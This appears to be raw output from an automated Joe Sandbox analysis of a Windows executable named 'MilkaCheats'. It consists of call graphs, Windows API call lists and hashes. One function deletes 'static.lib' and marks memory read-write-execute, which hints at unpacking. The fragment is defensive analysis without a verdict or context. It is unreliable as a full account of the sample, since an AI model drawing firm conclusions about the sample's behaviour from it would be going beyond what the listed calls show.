40750->40751 40759 d03d8 40750->40759 40751->40667 40757 c374f 41 API calls 40751->40757 40755 c678c 40755->40751 40777 cbbec 40755->40777 40757->40671 40758->40667 40760 d0321 ___scrt_is_nonwritable_in_current_image 40759->40760 40761 d0334 40760->40761 40763 d0354 40760->40763 40791 d030e 14 API calls __dosmaperr 40761->40791 40765 d0359 40763->40765 40766 d0366 40763->40766 40764 d0339 40792 cb6ef 41 API calls _Deallocate 40764->40792 40793 d030e 14 API calls __dosmaperr 40765->40793 40783 d6125 40766->40783 40770 c6771 40770->40751 40776 cc927 68 API calls _Deallocate 40770->40776 40772 d0376 40794 d030e 14 API calls __dosmaperr 40772->40794 40773 d0383 40795 d03c1 LeaveCriticalSection __fread_nolock 40773->40795 40776->40755 40778 cbbff _Deallocate 40777->40778 40821 cbac7 40778->40821 40780 cbc0b 40781 cb42b _Deallocate 41 API calls 40780->40781 40782 cbc17 40781->40782 40782->40751 40784 d6131 ___scrt_is_nonwritable_in_current_image 40783->40784 40796 cf8b0 EnterCriticalSection 40784->40796 40786 d613f 40797 d61c9 40786->40797 40791->40764 40792->40770 40793->40770 40794->40770 40795->40770 40796->40786 40798 d61ec 40797->40798 40799 d6244 40798->40799 40806 d614c 40798->40806 40814 cba9f EnterCriticalSection 40798->40814 40815 cbab3 LeaveCriticalSection 40798->40815 40816 d5459 14 API calls 2 library calls 40799->40816 40801 d624d 40817 d54b6 14 API calls __dosmaperr 40801->40817 40804 d6256 40804->40806 40818 d5a41 6 API calls std::_Lockit::_Lockit 40804->40818 40811 d6185 40806->40811 40808 d6275 40819 cba9f EnterCriticalSection 40808->40819 40810 d6288 40810->40806 40820 cf8f8 LeaveCriticalSection 40811->40820 40813 d036f 40813->40772 40813->40773 40814->40798 40815->40798 40816->40801 40817->40804 40818->40808 40819->40810 40820->40813 40822 cbad3 ___scrt_is_nonwritable_in_current_image 40821->40822 40823 cbadd 40822->40823 40824 cbb00 40822->40824 40847 cb672 29 API calls _Deallocate 40823->40847 40831 cbaf8 40824->40831 40832 cba9f EnterCriticalSection 40824->40832 40827 cbb1e 40833 cbb5e 40827->40833 40829 cbb2b 40848 cbb56 LeaveCriticalSection __fread_nolock 40829->40848 40831->40780 40832->40827 40834 cbb8e 40833->40834 40835 cbb6b 40833->40835 40845 cbb86 40834->40845 40849 cbe59 40834->40849 40873 cb672 29 API calls _Deallocate 40835->40873 40842 cbbba 40866 d5fb2 40842->40866 40845->40829 40847->40831 40848->40831 40850 cbba6 40849->40850 40851 cbe72 40849->40851 40855 d5cc8 40850->40855 40851->40850 40852 d5efa __fread_nolock 41 API calls 40851->40852 40853 cbe8e 40852->40853 40875 d6b8f 40853->40875 40856 d5cdf 40855->40856 40857 cbbae 40855->40857 40856->40857 40917 d54b6 14 API calls __dosmaperr 40856->40917 40859 d5efa 40857->40859 40860 d5f1b 40859->40860 40861 d5f06 40859->40861 40860->40842 40918 d030e 14 API calls __dosmaperr 40861->40918 40863 d5f0b 40919 cb6ef 41 API calls _Deallocate 40863->40919 40865 d5f16 40865->40842 40867 d5fdb 40866->40867 40872 cbbc1 40866->40872 40868 d602a 40867->40868 40870 d6002 40867->40870 40928 cb672 29 API calls _Deallocate 40868->40928 40920 d5f21 40870->40920 40872->40845 40874 d54b6 14 API calls __dosmaperr 40872->40874 40873->40845 40874->40845 40878 d6b9b ___scrt_is_nonwritable_in_current_image 40875->40878 40876 d6ba3 40876->40850 40877 d6c5f 40916 cb672 29 API calls _Deallocate 40877->40916 40878->40876 40878->40877 40880 d6bf0 40878->40880 40886 dc0e2 EnterCriticalSection 40880->40886 40882 d6bf6 40883 d6c13 40882->40883 40887 d6c97 40882->40887 40915 d6c57 LeaveCriticalSection __wsopen_s 40883->40915 40886->40882 40888 d6cbc 40887->40888 40914 d6cdf __wsopen_s 40887->40914 40889 d6cc0 40888->40889 40891 d6d1e 40888->40891 40890 cb672 _Deallocate 29 API calls 40889->40890 40890->40914 40892 d6d35 40891->40892 40893 d8475 __wsopen_s 43 API calls 40891->40893 40894 d67e4 __wsopen_s 42 API calls 40892->40894 40893->40892 40895 d6d3f 40894->40895 40896 d6d85 40895->40896 40897 d6d45 40895->40897 40900 d6d99 40896->40900 40901 d6de8 WriteFile 40896->40901 40898 d6d4c 40897->40898 40899 d6d6f 40897->40899 40906 d677c __wsopen_s 6 API calls 40898->40906 40898->40914 40902 d63aa __wsopen_s 47 API calls 40899->40902 40904 d6dd6 40900->40904 40905 d6da1 40900->40905 40903 d6e0a GetLastError 40901->40903 40912 d6d80 40901->40912 40902->40912 40903->40912 40907 d6862 __wsopen_s 7 API calls 40904->40907 40908 d6dc4 40905->40908 40909 d6da6 40905->40909 40906->40914 40907->40914 40910 d6a26 __wsopen_s 8 API calls 40908->40910 40911 d6daf 40909->40911 40909->40914 40910->40912 40913 d693d __wsopen_s 7 API calls 40911->40913 40912->40914 40913->40914 40914->40883 40915->40876 40916->40876 40917->40857 40918->40863 40919->40865 40921 d5f2d ___scrt_is_nonwritable_in_current_image 40920->40921 40929 dc0e2 EnterCriticalSection 40921->40929 40923 d5f3b 40924 d5f6c 40923->40924 40930 d6085 40923->40930 40943 d5fa6 LeaveCriticalSection __wsopen_s 40924->40943 40927 d5f8f 40927->40872 40928->40872 40929->40923 40931 dc35e __wsopen_s 41 API calls 40930->40931 40932 d6095 40931->40932 40933 d609b 40932->40933 40934 d60cd 40932->40934 40936 dc35e __wsopen_s 41 API calls 40932->40936 40935 dc2cd __wsopen_s 15 API calls 40933->40935 40934->40933 40937 dc35e __wsopen_s 41 API calls 40934->40937 40942 d60f3 __wsopen_s 40935->40942 40938 d60c4 40936->40938 40939 d60d9 CloseHandle 40937->40939 40940 dc35e __wsopen_s 41 API calls 40938->40940 40939->40933 40941 d60e5 GetLastError 40939->40941 40940->40934 40941->40933 40942->40924 40943->40927 40944->40675 40945->40677 40947 c25e6 40946->40947 40949 c2604 40947->40949 40955 c4a6e 40947->40955 40949->40578 40963 c5e2f 40950->40963 40952 c27dc 40953 c2795 40952->40953 40967 c3ccb 43 API calls 2 library calls 40952->40967 40953->40577 40956 c4a7a __EH_prolog3_catch 40955->40956 40957 c4b1f std::locale::_Setgloballocale 40956->40957 40958 c25d7 51 API calls 40956->40958 40957->40949 40961 c4a99 40958->40961 40959 c4b17 40960 c27d4 51 API calls 40959->40960 40960->40957 40961->40959 40962 c4022 43 API calls 40961->40962 40962->40959 40963->40952 40964 c85fa 40963->40964 40968 ca12c 8 API calls ___vcrt_FlsGetValue 40964->40968 40966 c85ff 40966->40952 40967->40953 40968->40966 40970 c503e __EH_prolog3_catch 40969->40970 40971 c25d7 51 API calls 40970->40971 40972 c5050 40971->40972 40973 c4022 43 API calls 40972->40973 40974 c50db 40973->40974 40975 c27d4 51 API calls 40974->40975 40976 c50e3 std::locale::_Setgloballocale 40975->40976 40976->40583 40978 c4096 40977->40978 40979 c40b2 40977->40979 40983 c33a3 40978->40983 40979->40588 40982 cbbec 71 API calls 40982->40979 40986 c33bf 40983->40986 40988 c33f1 40983->40988 40984 c6b4c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 40985 c3409 40984->40985 40985->40982 40986->40988 40989 ccc29 69 API calls _Deallocate 40986->40989 40988->40984 40989->40988 40990->40603 40991 c53a2 40992 c53cc 40991->40992 40993 c53ab 40991->40993 40993->40992 40996 cbf30 40993->40996 40995 c53bf 40997 cbf42 40996->40997 40998 cbf4b ___scrt_uninitialize_crt 40996->40998 41012 cbdb4 70 API calls ___scrt_uninitialize_crt 40997->41012 41001 cbf5c 40998->41001 41004 cbd54 40998->41004 41000 cbf48 41000->40995 41001->40995 41005 cbd60 ___scrt_is_nonwritable_in_current_image 41004->41005 41013 cba9f EnterCriticalSection 41005->41013 41007 cbd6e 41014 cbec2 41007->41014 41011 cbd91 41011->40995 41012->41000 41013->41007 41015 cbed7 _Deallocate 41014->41015 41016 cbede 41015->41016 41017 cbee9 41015->41017 41028 cbdb4 70 API calls ___scrt_uninitialize_crt 41016->41028 41019 cbe59 ___scrt_uninitialize_crt 66 API calls 41017->41019 41020 cbef3 41019->41020 41023 d5efa __fread_nolock 41 API calls 41020->41023 41026 cbee4 41020->41026 41021 cb42b _Deallocate 41 API calls 41022 cbd7f 41021->41022 41027 cbda8 LeaveCriticalSection __fread_nolock 41022->41027 41024 cbf0a 41023->41024 41029 d632d 45 API calls 3 library calls 41024->41029 41026->41021 41027->41011 41028->41026 41029->41026

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • DeleteFileA.KERNELBASE(static.lib), ref: 000C5AFD
                                                                                              • VirtualProtect.KERNELBASE(00141038,000004E4,00000040,?), ref: 000C5B10
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000C5B28
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 000C5B2B
                                                                                              • wsprintfA.USER32 ref: 000C5B3D
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000000,00000000,00000000), ref: 000C5B4D
                                                                                              • WriteConsoleA.KERNEL32(00000000), ref: 000C5B54
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000C5B5C
                                                                                              • HeapFree.KERNEL32(00000000), ref: 000C5B5F
                                                                                                • Part of subcall function 000C22BB: _strlen.LIBCMT ref: 000C22D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocConsoleDeleteFileFreeHandleProtectVirtualWrite_strlenwsprintf
                                                                                              • String ID: Window1$static.lib
                                                                                              • API String ID: 523815168-642987920
                                                                                              • Opcode ID: 2e232f1c38f731e84ff32c25fdbf2a5720b689eaefe7596c2d86953878836518
                                                                                              • Instruction ID: a8298945c7e73403d105cbcbf2f35244b42907d31810e89620a5efe6c0959a17
                                                                                              • Opcode Fuzzy Hash: 2e232f1c38f731e84ff32c25fdbf2a5720b689eaefe7596c2d86953878836518
                                                                                              • Instruction Fuzzy Hash: 6A4128716403406FE330AB61DC86FAF7798EF44B11F05452DFA05BB2D2DB74AC8586A1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 46 e1228-e1258 call e0f76 49 e125a-e1265 call d02fb 46->49 50 e1273-e127f call dc1ba 46->50 57 e1267-e126e call d030e 49->57 55 e1298-e12e1 call e0ee1 50->55 56 e1281-e1296 call d02fb call d030e 50->56 66 e134e-e1357 GetFileType 55->66 67 e12e3-e12ec 55->67 56->57 64 e154d-e1551 57->64 68 e1359-e138a GetLastError call d02b4 CloseHandle 66->68 69 e13a0-e13a3 66->69 71 e12ee-e12f2 67->71 72 e1323-e1349 GetLastError call d02b4 67->72 68->57 85 e1390-e139b call d030e 68->85 75 e13ac-e13b2 69->75 76 e13a5-e13aa 69->76 71->72 77 e12f4-e1321 call e0ee1 71->77 72->57 81 e13b6-e1404 call dc105 75->81 82 e13b4 75->82 76->81 77->66 77->72 88 e1406-e1412 call e10f0 81->88 89 e1423-e144b call e0c93 81->89 82->81 85->57 88->89 95 e1414 88->95 96 e144d-e144e 89->96 97 e1450-e1491 89->97 98 e1416-e141e call d6055 95->98 96->98 99 e14b2-e14c0 97->99 100 e1493-e1497 97->100 98->64 102 e154b 99->102 103 e14c6-e14ca 99->103 100->99 101 e1499-e14ad 100->101 101->99 102->64 103->102 105 e14cc-e14ff CloseHandle call e0ee1 103->105 109 e1533-e1547 105->109 110 e1501-e152d GetLastError call d02b4 call dc2cd 105->110 109->102 110->109
                                                                                              APIs
                                                                                                • Part of subcall function 000E0EE1: CreateFileW.KERNELBASE(?,00000000,?,000E12D1,?,?,00000000,?,000E12D1,?,0000000C), ref: 000E0EFE
                                                                                              • GetLastError.KERNEL32 ref: 000E133C
                                                                                              • __dosmaperr.LIBCMT ref: 000E1343
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 000E134F
                                                                                              • GetLastError.KERNEL32 ref: 000E1359
                                                                                              • __dosmaperr.LIBCMT ref: 000E1362
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 000E1382
                                                                                              • CloseHandle.KERNEL32(000DA86B), ref: 000E14CF
                                                                                              • GetLastError.KERNEL32 ref: 000E1501
                                                                                              • __dosmaperr.LIBCMT ref: 000E1508
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 09e0cc7ad84376a2f9ee8186cc23e4bfe162bf24c85cc757b96463126ae53146
                                                                                              • Instruction ID: 2b250a3bb6e2f6ba1880dd1da975bef681d06dbf5dde23a6bab955babe591fe8
                                                                                              • Opcode Fuzzy Hash: 09e0cc7ad84376a2f9ee8186cc23e4bfe162bf24c85cc757b96463126ae53146
                                                                                              • Instruction Fuzzy Hash: CBA12332A142949FCF199F68EC91BED7BB1AB46320F14015EF812AF3E2C7758952CB51

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 115 d6c97-d6cb6 116 d6cbc-d6cbe 115->116 117 d6e90 115->117 118 d6cea-d6d10 116->118 119 d6cc0-d6cdf call cb672 116->119 120 d6e92-d6e96 117->120 122 d6d16-d6d1c 118->122 123 d6d12-d6d14 118->123 126 d6ce2-d6ce5 119->126 122->119 125 d6d1e-d6d28 122->125 123->122 123->125 127 d6d38-d6d43 call d67e4 125->127 128 d6d2a-d6d35 call d8475 125->128 126->120 133 d6d85-d6d97 127->133 134 d6d45-d6d4a 127->134 128->127 137 d6d99-d6d9f 133->137 138 d6de8-d6e08 WriteFile 133->138 135 d6d4c-d6d50 134->135 136 d6d6f-d6d83 call d63aa 134->136 139 d6e58-d6e6a 135->139 140 d6d56-d6d65 call d677c 135->140 157 d6d68-d6d6a 136->157 144 d6dd6-d6de1 call d6862 137->144 145 d6da1-d6da4 137->145 142 d6e0a-d6e10 GetLastError 138->142 143 d6e13 138->143 146 d6e6c-d6e72 139->146 147 d6e74-d6e86 139->147 140->157 142->143 151 d6e16-d6e21 143->151 156 d6de6 144->156 152 d6dc4-d6dd4 call d6a26 145->152 153 d6da6-d6da9 145->153 146->117 146->147 147->126 158 d6e8b-d6e8e 151->158 159 d6e23-d6e28 151->159 162 d6dbf-d6dc2 152->162 153->139 160 d6daf-d6dba call d693d 153->160 156->162 157->151 158->120 163 d6e2a-d6e2f 159->163 164 d6e56 159->164 160->162 162->157 166 d6e48-d6e51 call d02d7 163->166 167 d6e31-d6e43 163->167 164->139 166->126 167->126
                                                                                              APIs
                                                                                                • Part of subcall function 000D63AA: GetConsoleOutputCP.KERNEL32(865EA617,00000000,00000000,00000000), ref: 000D640D
                                                                                              • WriteFile.KERNEL32(?,00000000,?,000EDA30,00000000,0000000C,00000000,00000000,00000000,00000000,000EDA30,00000010,000CCBA0,00000000,00000000,00000000), ref: 000D6E00
                                                                                              • GetLastError.KERNEL32 ref: 000D6E0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                                              • String ID:
                                                                                              • API String ID: 2915228174-0
                                                                                              • Opcode ID: c740cffccfca7a70decf9396611cf84b276280addc518a97fc266b4eae8e13b1
                                                                                              • Instruction ID: 73851170bb5b94138e242562aa1c99f71b48c7a92cf163c96c086fc793894a52
                                                                                              • Opcode Fuzzy Hash: c740cffccfca7a70decf9396611cf84b276280addc518a97fc266b4eae8e13b1
                                                                                              • Instruction Fuzzy Hash: B5618F75D00349AEDF21CFA8C884AEEBBB9AF0A304F144196E850AB352D376D945CB70

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 170 d6862-d68b7 call c7a30 173 d692c-d693c call c6b4c 170->173 174 d68b9 170->174 176 d68bf 174->176 178 d68c5-d68c7 176->178 179 d68c9-d68ce 178->179 180 d68e1-d6906 WriteFile 178->180 183 d68d7-d68df 179->183 184 d68d0-d68d6 179->184 181 d6908-d6913 180->181 182 d6924-d692a GetLastError 180->182 181->173 185 d6915-d6920 181->185 182->173 183->178 183->180 184->183 185->176 186 d6922 185->186 186->173
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,000D6DE6,00000000,00000000,00000000,?,0000000C,00000000), ref: 000D68FE
                                                                                              • GetLastError.KERNEL32(?,000D6DE6,00000000,00000000,00000000,?,0000000C,00000000,00000000,00000000,00000000,000EDA30,00000010,000CCBA0,00000000,00000000), ref: 000D6924
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastWrite
                                                                                              • String ID:
                                                                                              • API String ID: 442123175-0
                                                                                              • Opcode ID: 12e82836c2984419c817d67d2f0e4ffca2b307548a521f161c7c11d92c1a474d
                                                                                              • Instruction ID: c86f80050f239872bb39c21c23e125c27749ebb7ff27fbda28b30580a61eb3ac
                                                                                              • Opcode Fuzzy Hash: 12e82836c2984419c817d67d2f0e4ffca2b307548a521f161c7c11d92c1a474d
                                                                                              • Instruction Fuzzy Hash: F2218D35A002199BDF15CF29DC90AEDB7B9EB4D301B1441AAEA46D7311DB31DE82CB64

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 187 d6085-d6099 call dc35e 190 d609f-d60a7 187->190 191 d609b-d609d 187->191 193 d60a9-d60b0 190->193 194 d60b2-d60b5 190->194 192 d60ed-d610d call dc2cd 191->192 202 d611f 192->202 203 d610f-d611d call d02d7 192->203 193->194 195 d60bd-d60d1 call dc35e * 2 193->195 196 d60b7-d60bb 194->196 197 d60d3-d60e3 call dc35e CloseHandle 194->197 195->191 195->197 196->195 196->197 197->191 209 d60e5-d60eb GetLastError 197->209 207 d6121-d6124 202->207 203->207 209->192
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,000D5F6C,00000000,CF830579,000ED9D0,0000000C,000D6028,000CBBC1,?), ref: 000D60DB
                                                                                              • GetLastError.KERNEL32(?,000D5F6C,00000000,CF830579,000ED9D0,0000000C,000D6028,000CBBC1,?), ref: 000D60E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast
                                                                                              • String ID:
                                                                                              • API String ID: 918212764-0
                                                                                              • Opcode ID: 38bf3c9ce77df6be327681917484391f57ef49817df30dd93a70f702d620aaa5
                                                                                              • Instruction ID: c0f9081ba955da4bd718d249d381e8fa18ddf8323f2099088cf8fdee75f26886
                                                                                              • Opcode Fuzzy Hash: 38bf3c9ce77df6be327681917484391f57ef49817df30dd93a70f702d620aaa5
                                                                                              • Instruction Fuzzy Hash: 4C1129336003201AE6645674A846BBF7B894B82730F29411BF9188B3D3DB77998096F0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 212 da82c-da852 call da602 215 da8ab-da8ae 212->215 216 da854-da866 call e1208 212->216 218 da86b-da870 216->218 218->215 219 da872-da8aa 218->219
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: df35664125bcee942bbdcf641e23f3a11c6838a11d44c6808425e528eb912694
                                                                                              • Instruction ID: 0130b9eb889c3846403d1088f0aa1e39af93db5a8fac3a13545a411418fe508e
                                                                                              • Opcode Fuzzy Hash: df35664125bcee942bbdcf641e23f3a11c6838a11d44c6808425e528eb912694
                                                                                              • Instruction Fuzzy Hash: 6F1103B1A0420AAFCB05DF58E94599A7BF5EF49304F05406AF809AB352DA70EE118B65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 220 d8614-d8620 221 d8652-d865d call d030e 220->221 222 d8622-d8624 220->222 230 d865f-d8661 221->230 223 d863d-d864e RtlAllocateHeap 222->223 224 d8626-d8627 222->224 226 d8629-d8630 call d3251 223->226 227 d8650 223->227 224->223 226->221 232 d8632-d863b call d0e6d 226->232 227->230 232->221 232->223
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00000003,000CB4F2,?,000CB461,?,00000000,000CB670), ref: 000D8646
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d40529a67401b191264b9242efe1738f0a842b1749afef022a78819ab6d72a93
                                                                                              • Instruction ID: c5fae73c44c1bda15d102d5d6932dfc22a39c2e0cdf78cb47a042986bc50fbf3
                                                                                              • Opcode Fuzzy Hash: d40529a67401b191264b9242efe1738f0a842b1749afef022a78819ab6d72a93
                                                                                              • Instruction Fuzzy Hash: 39E0ED316013205AEA712A219C11BAE378CAB817B0F158973AC55A6392CF20CD0087B4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 235 e0ee1-e0f05 CreateFileW
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,00000000,?,000E12D1,?,?,00000000,?,000E12D1,?,0000000C), ref: 000E0EFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 55e8fd548351fcf93d452e997c4b8dc89457dfb08ae087a1af75f8abb56c6ed7
                                                                                              • Instruction ID: 0b0307b7c416feb99e73d3e278903726ad78f207ad38cef893f04eb32ef106ed
                                                                                              • Opcode Fuzzy Hash: 55e8fd548351fcf93d452e997c4b8dc89457dfb08ae087a1af75f8abb56c6ed7
                                                                                              • Instruction Fuzzy Hash: 6ED06C3200014DBBDF029F84DC46EDA3BAAFB48714F024040BA1866020C736E861AB90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
